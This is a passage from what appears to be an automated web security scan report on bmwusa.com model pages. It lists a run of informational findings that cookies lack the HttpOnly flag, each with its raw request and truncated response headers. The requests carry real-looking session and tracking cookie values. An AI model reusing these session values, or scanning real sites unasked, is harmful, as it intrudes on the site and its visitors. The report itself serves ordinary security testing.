Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Fri, 21 Jan 2011 21:22:53 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 21:42:53 GMT;path=/
Content-Length: 228844


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head id="c
...[SNIP]...

10.329. http://www.bmwusa.com/standard/content/vehicles/2011/7/750lixdrivesedan/features_and_specs/default.aspx%20

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bmwusa.com
Path:   /standard/content/vehicles/2011/7/750lixdrivesedan/features_and_specs/default.aspx%20

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /standard/content/vehicles/2011/7/750lixdrivesedan/features_and_specs/default.aspx%20 HTTP/1.1
Host: www.bmwusa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: VisitorID=89326a93-bb02-4e80-bf57-0d5590e90613; s_pers=%20s_nr%3D1295637746935%7C1298229746935%3B; CHECK=XP9y6GTRm#@U; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B; WK9733P=XyopNB6dCmvhTtil4cH2Vkfz3+2J/NQzvlMcUeiRYdZ8fjqtXBX7x/hZek/hEeoq; ddretarg=1; LK9H33C=LlItWTMXQYRZ6JknOkmjsTsNIlsgCk0BLOhnWkMKF/53WxmfXzUi2xu4wvcNH4wu; ASP.NET_SessionId=tukd5w45cqvbxc45facmuxeq; NSC_CNX_21529_64.29.204.16=4f52b42b3660; mbox=check#true#1295637806|session#1295637745501-300919#1295639606|PC#1295637745501-300919.17#1296847349;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Fri, 21 Jan 2011 21:22:37 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 21:42:37 GMT;path=/
Content-Length: 228845


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head id="c
...[SNIP]...

10.330. http://www.bmwusa.com/standard/content/vehicles/2011/7/750lixdrivesedan/modelhighlights/default.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bmwusa.com
Path:   /standard/content/vehicles/2011/7/750lixdrivesedan/modelhighlights/default.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /standard/content/vehicles/2011/7/750lixdrivesedan/modelhighlights/default.aspx HTTP/1.1
Host: www.bmwusa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: VisitorID=89326a93-bb02-4e80-bf57-0d5590e90613; s_pers=%20s_nr%3D1295637746935%7C1298229746935%3B; CHECK=XP9y6GTRm#@U; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B; WK9733P=XyopNB6dCmvhTtil4cH2Vkfz3+2J/NQzvlMcUeiRYdZ8fjqtXBX7x/hZek/hEeoq; ddretarg=1; LK9H33C=LlItWTMXQYRZ6JknOkmjsTsNIlsgCk0BLOhnWkMKF/53WxmfXzUi2xu4wvcNH4wu; ASP.NET_SessionId=tukd5w45cqvbxc45facmuxeq; NSC_CNX_21529_64.29.204.16=4f52b42b3660; mbox=check#true#1295637806|session#1295637745501-300919#1295639606|PC#1295637745501-300919.17#1296847349;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Fri, 21 Jan 2011 21:22:25 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 21:42:25 GMT;path=/
Content-Length: 216305


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head id="c
...[SNIP]...

10.331. http://www.bmwusa.com/standard/content/vehicles/2011/7/750lixdrivesedan/modelhighlights/default.aspx%20

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bmwusa.com
Path:   /standard/content/vehicles/2011/7/750lixdrivesedan/modelhighlights/default.aspx%20

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /standard/content/vehicles/2011/7/750lixdrivesedan/modelhighlights/default.aspx%20 HTTP/1.1
Host: www.bmwusa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: VisitorID=89326a93-bb02-4e80-bf57-0d5590e90613; s_pers=%20s_nr%3D1295637746935%7C1298229746935%3B; CHECK=XP9y6GTRm#@U; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B; WK9733P=XyopNB6dCmvhTtil4cH2Vkfz3+2J/NQzvlMcUeiRYdZ8fjqtXBX7x/hZek/hEeoq; ddretarg=1; LK9H33C=LlItWTMXQYRZ6JknOkmjsTsNIlsgCk0BLOhnWkMKF/53WxmfXzUi2xu4wvcNH4wu; ASP.NET_SessionId=tukd5w45cqvbxc45facmuxeq; NSC_CNX_21529_64.29.204.16=4f52b42b3660; mbox=check#true#1295637806|session#1295637745501-300919#1295639606|PC#1295637745501-300919.17#1296847349;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Fri, 21 Jan 2011 21:22:11 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 21:42:11 GMT;path=/
Content-Length: 216306


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head id="c
...[SNIP]...

10.332. http://www.bmwusa.com/standard/content/vehicles/2011/7/760lisedan/7seriessedanmediagallery.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bmwusa.com
Path:   /standard/content/vehicles/2011/7/760lisedan/7seriessedanmediagallery.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /standard/content/vehicles/2011/7/760lisedan/7seriessedanmediagallery.aspx HTTP/1.1
Host: www.bmwusa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: VisitorID=89326a93-bb02-4e80-bf57-0d5590e90613; s_pers=%20s_nr%3D1295637746935%7C1298229746935%3B; CHECK=XP9y6GTRm#@U; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B; WK9733P=XyopNB6dCmvhTtil4cH2Vkfz3+2J/NQzvlMcUeiRYdZ8fjqtXBX7x/hZek/hEeoq; ddretarg=1; LK9H33C=LlItWTMXQYRZ6JknOkmjsTsNIlsgCk0BLOhnWkMKF/53WxmfXzUi2xu4wvcNH4wu; ASP.NET_SessionId=tukd5w45cqvbxc45facmuxeq; NSC_CNX_21529_64.29.204.16=4f52b42b3660; mbox=check#true#1295637806|session#1295637745501-300919#1295639606|PC#1295637745501-300919.17#1296847349;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Fri, 21 Jan 2011 21:25:08 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 21:45:08 GMT;path=/
Content-Length: 201935


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head id="c
...[SNIP]...

10.333. http://www.bmwusa.com/standard/content/vehicles/2011/7/760lisedan/default.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bmwusa.com
Path:   /standard/content/vehicles/2011/7/760lisedan/default.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /standard/content/vehicles/2011/7/760lisedan/default.aspx HTTP/1.1
Host: www.bmwusa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: VisitorID=89326a93-bb02-4e80-bf57-0d5590e90613; s_pers=%20s_nr%3D1295637746935%7C1298229746935%3B; CHECK=XP9y6GTRm#@U; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B; WK9733P=XyopNB6dCmvhTtil4cH2Vkfz3+2J/NQzvlMcUeiRYdZ8fjqtXBX7x/hZek/hEeoq; ddretarg=1; LK9H33C=LlItWTMXQYRZ6JknOkmjsTsNIlsgCk0BLOhnWkMKF/53WxmfXzUi2xu4wvcNH4wu; ASP.NET_SessionId=tukd5w45cqvbxc45facmuxeq; NSC_CNX_21529_64.29.204.16=4f52b42b3660; mbox=check#true#1295637806|session#1295637745501-300919#1295639606|PC#1295637745501-300919.17#1296847349;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Fri, 21 Jan 2011 21:23:27 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 21:43:27 GMT;path=/
Content-Length: 257095


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head id="c
...[SNIP]...

10.334. http://www.bmwusa.com/standard/content/vehicles/2011/7/760lisedan/features_and_specs/default.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bmwusa.com
Path:   /standard/content/vehicles/2011/7/760lisedan/features_and_specs/default.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /standard/content/vehicles/2011/7/760lisedan/features_and_specs/default.aspx HTTP/1.1
Host: www.bmwusa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: VisitorID=89326a93-bb02-4e80-bf57-0d5590e90613; s_pers=%20s_nr%3D1295637746935%7C1298229746935%3B; CHECK=XP9y6GTRm#@U; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B; WK9733P=XyopNB6dCmvhTtil4cH2Vkfz3+2J/NQzvlMcUeiRYdZ8fjqtXBX7x/hZek/hEeoq; ddretarg=1; LK9H33C=LlItWTMXQYRZ6JknOkmjsTsNIlsgCk0BLOhnWkMKF/53WxmfXzUi2xu4wvcNH4wu; ASP.NET_SessionId=tukd5w45cqvbxc45facmuxeq; NSC_CNX_21529_64.29.204.16=4f52b42b3660; mbox=check#true#1295637806|session#1295637745501-300919#1295639606|PC#1295637745501-300919.17#1296847349;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Fri, 21 Jan 2011 21:25:25 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 21:45:25 GMT;path=/
Content-Length: 231691


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head id="c
...[SNIP]...

10.335. http://www.bmwusa.com/standard/content/vehicles/2011/7/760lisedan/features_and_specs/default.aspx%20

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bmwusa.com
Path:   /standard/content/vehicles/2011/7/760lisedan/features_and_specs/default.aspx%20

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /standard/content/vehicles/2011/7/760lisedan/features_and_specs/default.aspx%20 HTTP/1.1
Host: www.bmwusa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: VisitorID=89326a93-bb02-4e80-bf57-0d5590e90613; s_pers=%20s_nr%3D1295637746935%7C1298229746935%3B; CHECK=XP9y6GTRm#@U; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B; WK9733P=XyopNB6dCmvhTtil4cH2Vkfz3+2J/NQzvlMcUeiRYdZ8fjqtXBX7x/hZek/hEeoq; ddretarg=1; LK9H33C=LlItWTMXQYRZ6JknOkmjsTsNIlsgCk0BLOhnWkMKF/53WxmfXzUi2xu4wvcNH4wu; ASP.NET_SessionId=tukd5w45cqvbxc45facmuxeq; NSC_CNX_21529_64.29.204.16=4f52b42b3660; mbox=check#true#1295637806|session#1295637745501-300919#1295639606|PC#1295637745501-300919.17#1296847349;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Fri, 21 Jan 2011 21:25:15 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 21:45:15 GMT;path=/
Content-Length: 231692


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head id="c
...[SNIP]...

10.336. http://www.bmwusa.com/standard/content/vehicles/2011/7/760lisedan/modelhighlights/default.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bmwusa.com
Path:   /standard/content/vehicles/2011/7/760lisedan/modelhighlights/default.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /standard/content/vehicles/2011/7/760lisedan/modelhighlights/default.aspx HTTP/1.1
Host: www.bmwusa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: VisitorID=89326a93-bb02-4e80-bf57-0d5590e90613; s_pers=%20s_nr%3D1295637746935%7C1298229746935%3B; CHECK=XP9y6GTRm#@U; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B; WK9733P=XyopNB6dCmvhTtil4cH2Vkfz3+2J/NQzvlMcUeiRYdZ8fjqtXBX7x/hZek/hEeoq; ddretarg=1; LK9H33C=LlItWTMXQYRZ6JknOkmjsTsNIlsgCk0BLOhnWkMKF/53WxmfXzUi2xu4wvcNH4wu; ASP.NET_SessionId=tukd5w45cqvbxc45facmuxeq; NSC_CNX_21529_64.29.204.16=4f52b42b3660; mbox=check#true#1295637806|session#1295637745501-300919#1295639606|PC#1295637745501-300919.17#1296847349;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Fri, 21 Jan 2011 21:24:30 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 21:44:30 GMT;path=/
Content-Length: 215290


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head id="c
...[SNIP]...

10.337. http://www.bmwusa.com/standard/content/vehicles/2011/7/760lisedan/modelhighlights/default.aspx%20

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bmwusa.com
Path:   /standard/content/vehicles/2011/7/760lisedan/modelhighlights/default.aspx%20

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /standard/content/vehicles/2011/7/760lisedan/modelhighlights/default.aspx%20 HTTP/1.1
Host: www.bmwusa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: VisitorID=89326a93-bb02-4e80-bf57-0d5590e90613; s_pers=%20s_nr%3D1295637746935%7C1298229746935%3B; CHECK=XP9y6GTRm#@U; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B; WK9733P=XyopNB6dCmvhTtil4cH2Vkfz3+2J/NQzvlMcUeiRYdZ8fjqtXBX7x/hZek/hEeoq; ddretarg=1; LK9H33C=LlItWTMXQYRZ6JknOkmjsTsNIlsgCk0BLOhnWkMKF/53WxmfXzUi2xu4wvcNH4wu; ASP.NET_SessionId=tukd5w45cqvbxc45facmuxeq; NSC_CNX_21529_64.29.204.16=4f52b42b3660; mbox=check#true#1295637806|session#1295637745501-300919#1295639606|PC#1295637745501-300919.17#1296847349;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Fri, 21 Jan 2011 21:24:06 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 21:44:06 GMT;path=/
Content-Length: 215291


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head id="c
...[SNIP]...

10.338. http://www.bmwusa.com/standard/content/vehicles/2011/7/activehybrid750i/7seriessedanmediagallery.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bmwusa.com
Path:   /standard/content/vehicles/2011/7/activehybrid750i/7seriessedanmediagallery.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /standard/content/vehicles/2011/7/activehybrid750i/7seriessedanmediagallery.aspx HTTP/1.1
Host: www.bmwusa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: VisitorID=89326a93-bb02-4e80-bf57-0d5590e90613; s_pers=%20s_nr%3D1295637746935%7C1298229746935%3B; CHECK=XP9y6GTRm#@U; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B; WK9733P=XyopNB6dCmvhTtil4cH2Vkfz3+2J/NQzvlMcUeiRYdZ8fjqtXBX7x/hZek/hEeoq; ddretarg=1; LK9H33C=LlItWTMXQYRZ6JknOkmjsTsNIlsgCk0BLOhnWkMKF/53WxmfXzUi2xu4wvcNH4wu; ASP.NET_SessionId=tukd5w45cqvbxc45facmuxeq; NSC_CNX_21529_64.29.204.16=4f52b42b3660; mbox=check#true#1295637806|session#1295637745501-300919#1295639606|PC#1295637745501-300919.17#1296847349;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Fri, 21 Jan 2011 21:29:41 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 21:49:41 GMT;path=/
Content-Length: 202033


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head id="c
...[SNIP]...

10.339. http://www.bmwusa.com/standard/content/vehicles/2011/7/activehybrid750i/default.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bmwusa.com
Path:   /standard/content/vehicles/2011/7/activehybrid750i/default.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /standard/content/vehicles/2011/7/activehybrid750i/default.aspx HTTP/1.1
Host: www.bmwusa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: VisitorID=89326a93-bb02-4e80-bf57-0d5590e90613; s_pers=%20s_nr%3D1295637746935%7C1298229746935%3B; CHECK=XP9y6GTRm#@U; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B; WK9733P=XyopNB6dCmvhTtil4cH2Vkfz3+2J/NQzvlMcUeiRYdZ8fjqtXBX7x/hZek/hEeoq; ddretarg=1; LK9H33C=LlItWTMXQYRZ6JknOkmjsTsNIlsgCk0BLOhnWkMKF/53WxmfXzUi2xu4wvcNH4wu; ASP.NET_SessionId=tukd5w45cqvbxc45facmuxeq; NSC_CNX_21529_64.29.204.16=4f52b42b3660; mbox=check#true#1295637806|session#1295637745501-300919#1295639606|PC#1295637745501-300919.17#1296847349;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Fri, 21 Jan 2011 21:30:37 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 21:50:37 GMT;path=/
Content-Length: 212053


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head id="c
...[SNIP]...

10.340. http://www.bmwusa.com/standard/content/vehicles/2011/7/activehybrid750i/default.aspx%20

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bmwusa.com
Path:   /standard/content/vehicles/2011/7/activehybrid750i/default.aspx%20

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /standard/content/vehicles/2011/7/activehybrid750i/default.aspx%20 HTTP/1.1
Host: www.bmwusa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: VisitorID=89326a93-bb02-4e80-bf57-0d5590e90613; s_pers=%20s_nr%3D1295637746935%7C1298229746935%3B; CHECK=XP9y6GTRm#@U; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B; WK9733P=XyopNB6dCmvhTtil4cH2Vkfz3+2J/NQzvlMcUeiRYdZ8fjqtXBX7x/hZek/hEeoq; ddretarg=1; LK9H33C=LlItWTMXQYRZ6JknOkmjsTsNIlsgCk0BLOhnWkMKF/53WxmfXzUi2xu4wvcNH4wu; ASP.NET_SessionId=tukd5w45cqvbxc45facmuxeq; NSC_CNX_21529_64.29.204.16=4f52b42b3660; mbox=check#true#1295637806|session#1295637745501-300919#1295639606|PC#1295637745501-300919.17#1296847349;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Fri, 21 Jan 2011 21:26:00 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 21:46:00 GMT;path=/
Content-Length: 212054


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head id="c
...[SNIP]...

10.341. http://www.bmwusa.com/standard/content/vehicles/2011/7/activehybrid750i/features_and_specs/default.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bmwusa.com
Path:   /standard/content/vehicles/2011/7/activehybrid750i/features_and_specs/default.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /standard/content/vehicles/2011/7/activehybrid750i/features_and_specs/default.aspx HTTP/1.1
Host: www.bmwusa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: VisitorID=89326a93-bb02-4e80-bf57-0d5590e90613; s_pers=%20s_nr%3D1295637746935%7C1298229746935%3B; CHECK=XP9y6GTRm#@U; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B; WK9733P=XyopNB6dCmvhTtil4cH2Vkfz3+2J/NQzvlMcUeiRYdZ8fjqtXBX7x/hZek/hEeoq; ddretarg=1; LK9H33C=LlItWTMXQYRZ6JknOkmjsTsNIlsgCk0BLOhnWkMKF/53WxmfXzUi2xu4wvcNH4wu; ASP.NET_SessionId=tukd5w45cqvbxc45facmuxeq; NSC_CNX_21529_64.29.204.16=4f52b42b3660; mbox=check#true#1295637806|session#1295637745501-300919#1295639606|PC#1295637745501-300919.17#1296847349;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Fri, 21 Jan 2011 21:30:33 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 21:50:33 GMT;path=/
Content-Length: 229185


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head id="c
...[SNIP]...

10.342. http://www.bmwusa.com/standard/content/vehicles/2011/7/activehybrid750i/features_and_specs/default.aspx%20

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bmwusa.com
Path:   /standard/content/vehicles/2011/7/activehybrid750i/features_and_specs/default.aspx%20

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /standard/content/vehicles/2011/7/activehybrid750i/features_and_specs/default.aspx%20 HTTP/1.1
Host: www.bmwusa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
